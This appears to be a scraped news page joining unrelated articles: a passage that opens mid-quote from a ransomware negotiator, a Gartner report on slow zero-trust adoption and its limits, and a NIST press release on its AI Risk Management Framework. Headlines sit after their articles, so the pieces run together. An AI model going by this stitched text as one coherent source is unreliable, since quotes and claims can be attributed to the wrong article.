"Obviously, there's no honor among thieves, but they do believe in their reputation," he says. "There are edge cases where something bad happens, but most commonly the bigger groups are going to make sure they don't post your data and they're going to provide you the decryptor. It's not going to be some malware backdoor decryptor that's going to do more damage. They're very focused on their reputation, and their business model simply just doesn't work if you pay them and then they still leak your data or they don't give you what they're supposed to."

7 Insights From a Ransomware Negotiator

Only one in 10 enterprises will create a robust zero-trust foundation in the next three years, while more than half of attacks won't even be prevented by it, according to Gartner.

The zero-trust approach to security promises to reduce threats and make successful attacks less damaging, but companies should not expect that implementing zero-trust principles will be easy or prevent most attacks, business intelligence firm Gartner said this week.

While interest in zero-trust architectures is high, only about 1% of organizations currently have a mature program that meets the definition of zero trust. The firm also estimates that only a 10th of all organizations will create a mature zero-trust framework by 2026, and by that time, those measures will end up only blocking or minimizing the impact of about half of all attacks. 

Even so, moving from 1% to 10% is significant progress, says John Watts, vice president analyst at Gartner.

"That's a relatively large increase," he says. "\[Ten percent\] may seem low, but at the same time, right now, when we talk to clients, and we look at other industry data points, it doesn't seem like there are many large organizations you can point to that have a mature and measurable zero-trust program."

Zero-trust initiatives continue to be an aspirational goal for companies and their cybersecurity teams, with 80% of executives indicating that the strategy is a top priority and 77% increasing their budget for implementation, according to a 2022 survey published by the Cloud Security Alliance in June. A separate report published by Microsoft in 2021 found that 96% of security leaders considered zero trust critical to their success — and 76% were "in the process" of implementing a zero-trust initiative.

**Turning Zero Trust Into Action**

As companies mull their paths forward, they should recognize that getting to a comprehensive zero-trust architecture is not easy and will take time, says Christopher Hallenbeck, CISO for the Americas at Tanium, a provider of converged endpoint management.

"The process of migrating to zero trust can seem overwhelming, and it often causes paralysis," he says. "I’m surprised the \[forecasted\] number is as high as 10%. While many organizations have zero-trust aspirations, few have made holistic changes to fully embrace it."

It can also be confusing, given the widespread use of "zero trust" in the marketing of cybersecurity products and services. 

In a prior Insights report, Gartner pushed back against the overzealous use of the term. Neil MacDonald, a distinguished vice president and analyst at the firm, said that zero trust requires that the degree of trust granted to users and devices need be explicitly granted, continuously calculated, and then adapted to allow the right amount of access only for as long as necessary.

"Zero trust is a way of thinking, not a specific technology or architecture," he said. "It's really about zero implicit trust, as that's what we want to get rid of."

While the notion of removing implicit trust from enterprise computing infrastructure is a good one, the architecture is difficult and time-consuming to implement and does not solve all problems, the analyst firm stated as part of this week's post.

As such, organizations need to move to integrating zero-trust initiatives into specific pieces of their operations, Hallenbeck notes.

"You need to configure each system to bring it under zero trust and should prioritize those systems holding the most sensitive information," he says. "It all comes down to knowing what you have in order to form a plan."

**Know the Limits of Zero Trust**

Indeed, knowing the scope and limits of zero trust is critical, Gartner's Watts says. The architecture and technologies used in zero-trust implementations are good for blocking lateral movement and containing the impact of an initial breach. However, companies should not expect a zero-trust service to prevent compromises of consumer-facing systems.

Anything that's intended for consumer consumption and exposed to the Internet, where anybody can find and try to use the service, is not a candidate for zero trust and not in scope for a company's initiatives, Watts says. Attackers are already starting to bypass some identity and authentication techniques, such as last year's compromise of Rockstar Games through spear-phishing and an internal collaboration platform. They will continued to find entry points that are not controlled by zero-trust protections, or they will focus on the weakness of zero trust, he says.

The firm, in fact, predicts that by 2026, zero trust will not be able to prevent more than half of all cyberattacks.

Still, adopting zero-trust frameworks will eventually pay off, Tanium's Hallenbeck says. A company with a mature zero-trust program knows "what systems \[they\] have and where data lives," he says. In that way, even if an attacker bypasses a zero-trust protection, the organization can limit the damage by limiting the attacker's access to internal systems and data.

"We're just starting to move past this phase, from where every vendor tells you they can solve all your zero-trust problems, and into the space where organizations now are implementing more zero-trust controls," Watts says. "They're facing a reality of both good and bad, right? And it's not all good, and it's not all bad."

Companies Struggle With Zero Trust as Attackers Adapt to Get Around It

New guidance seeks to cultivate trust in AI technologies and promote AI innovation while mitigating risk

**January 26, 2023-****WASHINGTON —** The U.S. Department of Commerce’s National Institute of Standards and Technology (NIST) has released its _Artificial Intelligence Risk Management Framework_ (AI RMF 1.0), a guidance document for voluntary use by organizations designing, developing, deploying or using AI systems to help manage the many risks of AI technologies. 

The AI RMF follows a direction from Congress for NIST to develop the framework and was produced in close collaboration with the private and public sectors. It is intended to adapt to the AI landscape as technologies continue to develop, and to be used by organizations in varying degrees and capacities so that society can benefit from AI technologies while also being protected from its potential harms.

“This voluntary framework will help develop and deploy AI technologies in ways that enable the United States, other nations and organizations to enhance AI trustworthiness while managing risks based on our democratic values,” said Deputy Commerce Secretary Don Graves. “It should accelerate AI innovation and growth while advancing — rather than restricting or damaging — civil rights, civil liberties and equity for all.” 

Compared with traditional software, AI poses a number of different risks. AI systems are trained on data that can change over time, sometimes significantly and unexpectedly, affecting the systems in ways that can be difficult to understand. These systems are also “socio-technical” in nature, meaning they are influenced by societal dynamics and human behavior. AI risks can emerge from the complex interplay of these technical and societal factors, affecting people’s lives in situations ranging from their experiences with online chatbots to the results of job and loan applications.   

The framework equips organizations to think about AI and risk differently. It promotes a change in institutional culture, encouraging organizations to approach AI with a new perspective — including how to think about, communicate, measure and monitor AI risks and its potential positive and negative impacts.

The AI RMF provides a flexible, structured and measurable process that will enable organizations to address AI risks. Following this process for managing AI risks can maximize the benefits of AI technologies while reducing the likelihood of negative impacts to individuals, groups, communities, organizations and society.

The framework is part of NIST’s larger effort to cultivate trust in AI technologies — necessary if the technology is to be accepted widely by society, according to Under Secretary for Standards and Technology and NIST Director Laurie E. Locascio. 

“The AI Risk Management Framework can help companies and other organizations in any sector and any size to jump-start or enhance their AI risk management approaches,” Locascio said. “It offers a new way to integrate responsible practices and actionable guidance to operationalize trustworthy and responsible AI. We expect the AI RMF to help drive development of best practices and standards.”

The AI RMF is divided into two parts. The first part discusses how organizations can frame the risks related to AI and outlines the characteristics of trustworthy AI systems. The second part, the core of the framework, describes four specific functions — govern, map, measure and manage — to help organizations address the risks of AI systems in practice. These functions can be applied in context-specific use cases and at any stages of the AI life cycle.

Working closely with the private and public sectors, NIST has been developing the AI RMF for 18 months. The document reflects about 400 sets of formal comments NIST received from more than 240 different organizations on draft versions of the framework. NIST today released statements from some of the organizations that have already committed to use or promote the framework.

The agency also today released a companion voluntary AI RMF Playbook, which suggests ways to navigate and use the framework. 

NIST plans to work with the AI community to update the framework periodically and welcomes suggestions for additions and improvements to the playbook at any time. Comments received by the end of February 2023 will be included in an updated version of the playbook to be released in spring 2023.

In addition, NIST plans to launch a Trustworthy and Responsible AI Resource Center to help organizations put the AI RMF 1.0 into practice. The agency encourages organizations to develop and share profiles of how they would put it to use in their specific contexts. Submissions may be sent to \[email protected\].

NIST is committed to continuing its work with companies, civil society, government agencies, universities and others to develop additional guidance. The agency today issued a roadmap for that work.

The framework is part of NIST’s broad and growing portfolio of AI-related work that includes fundamental and applied research along with a focus on measurement and evaluation, technical standards, and contributions to AI policy.

Tag

#intel